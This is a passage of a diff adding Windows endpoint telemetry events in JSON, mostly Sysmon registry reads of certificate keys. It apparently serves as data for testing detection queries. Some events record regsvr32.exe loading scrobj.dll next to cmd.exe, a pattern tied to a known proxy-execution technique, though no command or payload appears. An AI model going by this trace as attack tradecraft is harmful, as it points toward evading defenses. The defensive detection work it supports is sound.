"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\System32\\sfc_os.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "scrobj.dll", + "image_path": "C:\\Windows\\System32\\scrobj.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 